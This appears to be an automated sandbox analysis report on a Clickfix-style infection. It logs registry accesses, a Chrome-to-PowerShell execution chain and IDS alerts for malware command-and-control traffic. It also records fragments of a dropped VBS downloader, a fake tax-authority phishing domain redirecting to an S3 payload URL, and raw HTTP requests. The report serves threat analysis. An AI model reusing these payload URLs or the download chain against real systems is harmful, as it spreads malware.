Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2057788 - Severity 1 - ET MALWARE Clickfix Style Post-Infection CnC Request (GET) : 192.168.2.8:49713 -> 3.133.160.140:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 3.5.129.15 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 3.128.172.139 80			Jump to behavior

Potential malicious VBS script found (has network functionality)

Source: C:\Windows\SysWOW64\wscript.exe	Dropped file: uLjbLyHafwdgBirRYYWwRwAKVWNxtehSSYhaZHjsDqWqB.Write jtEWptXBzRdSjyqvEbRkbQgYRevuIjSxDSYC.ResponseBody			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	Dropped file: uLjbLyHafwdgBirRYYWwRwAKVWNxtehSSYhaZHjsDqWqB.SaveToFile qbTxAlzvudJrOwKiZstoxYKasliOKryMbgyUHASPovfsUOu			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

HTTP traffic: Redirect from: autoridade-tributaria.com to https://ld-1803-p.s3.us-east-2.amazonaws.com/moimnba

Source: Joe Sandbox View

IP Address: 162.241.60.162 162.241.60.162

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49713 -> 3.133.160.140:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49730 -> 3.5.129.15:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49714 -> 52.219.108.138:443

Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.201.147
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.201.147
Source: unknown	TCP traffic detected without corresponding DNS query: 3.133.160.140
Source: unknown	TCP traffic detected without corresponding DNS query: 3.133.160.140
Source: unknown	TCP traffic detected without corresponding DNS query: 3.133.160.140
Source: unknown	TCP traffic detected without corresponding DNS query: 3.133.160.140
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 3.133.160.140
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 3.133.160.140
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.90
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.40
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.40
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.40
Source: unknown	TCP traffic detected without corresponding DNS query: 3.128.172.139
Source: unknown	TCP traffic detected without corresponding DNS query: 3.128.172.139
Source: unknown	TCP traffic detected without corresponding DNS query: 3.128.172.139
Source: unknown	TCP traffic detected without corresponding DNS query: 3.128.172.139
Source: unknown	TCP traffic detected without corresponding DNS query: 3.128.172.139
Source: unknown	TCP traffic detected without corresponding DNS query: 3.128.172.139
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0YZQ3N229O591GF0ZIT5MKKQOKS71864Y8SS572AUQM32YALK2KQB1HCAHBE44BARAJ3KK5KQSN5N4ZWKHJ8JR371QRW5KFKOLO1QHX97AAUQM0FVPQWVC19HNBJIH30MWTBS5ISXLBJRJTQKMDSITELUOVDFN1YHJI23KWYG8CLBSU74XV6DMT3UHSELEMIUMCHB0Z9WPMJR4JC4WJU14Z50QIZGUPBW310PM6E9VJKAINK7QJZ51RKYGRX HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/blbqmfvyzokirjipwxvkuuwimqkkvhplpmctnfklilkidsvirasrnidgstxvzgdtlrkheweiusdvegzvkcnuiltwtvflebzjyegpjpmtuaxwuxdtpjpfgrdneqvknwqduigjibwfcijpgyzebirupvarvgoblzwfwvdlmdfirwinbvjgutqmyxifwahxobsyjmzbnaobszxhxglocrrodfheoliwrwjzqlboidgorlmxwgptnifpehiwmlcyaokdjdyodcvhifqpdzmxvfxijxeuoajowmpomelakwdxplgugzyfacruictvvmcgxgypckobtphisoleyyedkysgvfhyrlowzrrxqzpberptdhotfwomnckfysgnqrfmgxihthdrvvpqppeshzsgdzlmakhcoiukbfsxjzxwewepbpfossnpgkucojjlpqhhahtdpxbrwbipsvsyevebfjngjwsqaeyxayuowfuowtmubycvthzkmcdookuzmvfjehibwgreipdrvxylqhrpwdgslvgauqvaxqctlrnktodvywcgikbwlfwuodcoawuluqdzukkktupgrhrzpgitlibasqmqoeilrcskhnoohrvclxbolwvyjuizzwxqzhydtdiwqkompxjvzpveclglbbhkqobzdjivjdtmrtfdbkcbgpvjbmlmnxwihwwpcrnddrappjoqjhbumigtcsopaigatyolgusxyojwvkwkmzodenijfbzndpxzbloxdnjexyhezgsbofgozcujqvjeofka HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0YZQ3N229O591GF0ZIT
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/qpjntqlzrtiusxgwhokvrreaoeoviuukjyrnvhsyoeyyuxvdguuxrxnsuzhzaruigzdxiikghqaknrfeqetydqfrbxkfhzwbrxlbbfeabpfaqxujnnsylunoedbxkdephfqtcmwoiwgsxojjdzfghrykgasrwpyhbqyvtcsmvnesnvucbwdkqvhjrgajmgwocdumpeapnvipweirbvpfrynxztxceerhuzzflcmaqigbnglnerasvbyuarohgrmlwqmqinzcqvtcjbvgrnxhulbyxmkmfirhfunrpgrjgivzptkwcsfknqqoavbquytjylppvnytmevenulkgxzyfisexoovzpommwltvrkgnxikuxjidxqxhoollyzkbqgqombwqizgvgbthawhbvtqkqrisiuanpbdzbqvpkvidicjeixeobfroavbbkqndjqlzosxgbhikktuthsckdcvymacbcmawyujxfallpbjwzotsosnpzueyaoeqnmyzspymnndfsasaxigweqcnrxzhxzfuebwzejmpemywghaofdokglrpniwyrzmyrwrrfskjejbakhcmdgdshilrfdpabqkqzwmzxmpgtxxlnqbyhftjysuuorfbcestegqfosaxjcefghemlvjhejkfrpbrzejktkuvstzfuftqmhduqdhoffclwtrvhiowjzupfeajyrvhicswdmypmldivfwsustvxzuoewwschxafjzwnkcasnvwilstlosbomdxwvoztzpvsyjjortrufwinymr HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0YZQ3N229O591GF0ZI
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/qrdrpgpsycojktldbydzysuljcvnysqdalsxoetwypsjawxtvynsvdpwznrdrpbribkggkfkhsoverpqwinadchohxizqfuphdiezxeputivgtspaxlmfscxgscgfgevytwkhyazngmsuytsmutzriqnbpojfpurnaqxyakiuzszsgliojgpnpqidmozomomnnozzyiqdazlabuaxexsvkfmfmdblinasxubrrxfjpldcxzrkdaybwqjebqtjwbgbfryomoopiqloqnheiceujlqfvrmbaujvpxokwymbxfvfhehpbxnaolettazmapwnphehobyjlddefwegzliwirdnzudvgnkxxbilqzfifoluxwvbxafstkxlxhdokzyymnsjhexasazqhrjdycbfhgdsfcklmotxpkhybissuejnjzbwmlzhmxtsubpkrdghrnjcsirzlykqmvnvccidhnxfvgssjtdvmakefibrzpcffkoypitcviyctywthwknaidswvkuxnvxieiieqbwlxoneumhkafqlcokdlmrbmboyxcicukhvapaaphiwcbrgdykvbixlkqgkplpzveputgemkeaderkfrtwwyegilqiflhzsyyenjyzzpjwyqztfbslplouidijfypqjspqjkgqdsfoeceapxvvmghwddhgmvvxhxgyzrcnxoldbkusteibhgiawkhaibmlcmgfggqjkgasbrlokytlbszbtdlbjykcqugwhkhccdbvuheoppunyytajtzyixrazgcomrrxptafhudzmvmbormh HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWU
Source: global traffic	HTTP traffic detected: GET /MAR-FAT/pegsvkiogiitzpysfwdxoufkmiuncrodidrzkleklmgltfceayslcwnuactsgsulkjbsccxcgnhlsfixyolaosnelfvmvkvvhtnkjzzgarioboxvfiasapiuropepkqvtplqvyerinnsiklbdckttykbzivjtljdvikjldmmzvgefetykyxshohsuxnyqqmutqgtjxdycpgktovexfwjmkwquxzawgqbcnbfbwsqzciddnbquncuiticzhuxhwvlpefleyxkgwtjwgalkqohebamnergahftgcgiqesjsswhrdlylsljncnnxzrwlngxkycapaktkpikowmwucgugwuduhcxczpgmruznametwbkujkzoirrhowpeclsydfghprvccsmgzgjuwuoegrgbtfghnnvbvirwbkneicsuugkitlwhzocbelxnyjeuchomwufzdvfkhucjtlptvszbtjkpbhwtgxdqyxhycnolsscftcqtkwydueanstfuwaxbncmtcvnnqekgyzcroahpugelcpvbtwqwaaqhgugkvqhitxjdjkpzmeovpwoxywjfemzsyqaghtejxxcbdlpcvwckvunyusiszoxnuylhikvpijeonxiaclbcuyczujbcqqciqjhfltfndusbhtdzvgvencwfvahjohkcqzrulfoxvzdeoeoorydanhrzwcbunjczdaxciljrccbvsripslxkjuqwhgpymzmkuznmjjiduijdhzoceujfadctpmknqlibkplocclsejencbmjnlzsodstqzipkk HTTP/1.1Host: autoridade-tributaria.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIU